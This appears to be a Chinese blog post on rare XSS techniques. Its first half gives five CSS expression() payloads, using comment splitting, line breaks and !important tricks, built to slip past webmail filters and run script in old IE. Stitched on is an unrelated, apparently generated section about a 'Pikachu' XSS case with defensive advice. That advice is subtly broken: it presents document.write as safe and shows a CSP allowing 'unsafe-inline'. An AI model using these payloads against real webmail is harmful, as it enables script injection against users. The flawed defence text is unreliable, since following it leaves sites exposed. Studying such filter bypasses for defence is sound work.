xss相关的少见内容

expression的变形千变万化,只需要根据CSS Parser进行FUZZER就能挖掘很多WEBMAIL的XSS 0DAY。 

下面是几个我记得的例子: 

1.IE的CSS语法解析很宽松,导致的执行代码的特例。 
<style> 
.ExternalClass #ecxx 
{color:rgb(''zzzz&quot;x:expression(alert());} 
</style> 
<div id="ecxx"></div> 

2.expression的注释千变万化,很多webmail的过滤会导致二次漏洞,过滤后的代码反而执行了。 
<style>*{x:expr//*/*/*/*/*/*/ession(alert()) }</style> 

3.回车换行往往是被忽略的地方。 
<style> 
body{xsser:Expr/*eX 
pr*/esSion(eval(String.fromCharCode( 
11,22,33, 
44,55,66 
))); 

</style> 

4.意想不到的地方出现important,会绕过一些过滤器。 

<DIV id="code" title="alert()"></DIV> 
<style> 
body{ 
top:rgb('88',80,'180); 
top:rgb(') !important 
height:exp_ression((window.r==123)?x=8:(eval(code.title)==20088) || (r=123))}',80,'180); 

</style> 

5.在标题和表单中注入expression会产生意想不到的结果。 

style="x:expression(eval((window.r!=1)?(window.r=1,alert(111111111)):1));'xxx:xx');" 
### 关于皮卡丘 XSS 攻击案例 针对特定主题如“皮卡丘”的XSS攻击案例可能较为少见,因为实际中的安全事件通常不会以卡通形象命名。然而,在Web应用程序中确实存在许多利用XSS漏洞实施攻击的情况[^2]。 对于任何Web应用而言,如果程序未能充分验证或转义用户提交的数据,则可能导致恶意脚本注入并被执行。这不仅限于某个具体名称或者对象(比如皮卡丘),而是广泛存在于各类网站和服务之中。 ### 防护措施建议 为了防止跨站脚本攻击的发生,可以采取如下几种常见而有效的防御手段: #### 输入过滤与输出编码 确保所有来自用户的输入都经过严格的校验和清理过程,去除潜在有害字符;当这些数据再次呈现给其他用户浏览时,应该按照HTML标准进行适当转换处理,使得特殊符号不再具备语法意义。 ```html <!-- 不安全的做法 --> <div>{{ user_input }}</div> <!-- 安全做法 --> <script> document.write(escapeHtml(userInput)); </script> ``` #### HTTP头部设置 通过响应头`Content-Security-Policy (CSP)`来限定页面可加载资源的位置以及允许执行哪些类型的JavaScript代码,从而减少外部不可信源的影响范围。 ```http Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline' https://apis.example.com; ``` #### 使用框架自带的安全机制 现代开发工具包往往内置了一些保护功能,默认情况下会自动帮助开发者规避大部分常见的安全隐患,例如Django模板引擎会对变量插值做默认转义操作。 #### 用户教育 提醒注册会员注意个人信息保密原则,警惕钓鱼链接陷阱,定期更改密码等良好习惯有助于降低遭受社会工程学攻击的风险概率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值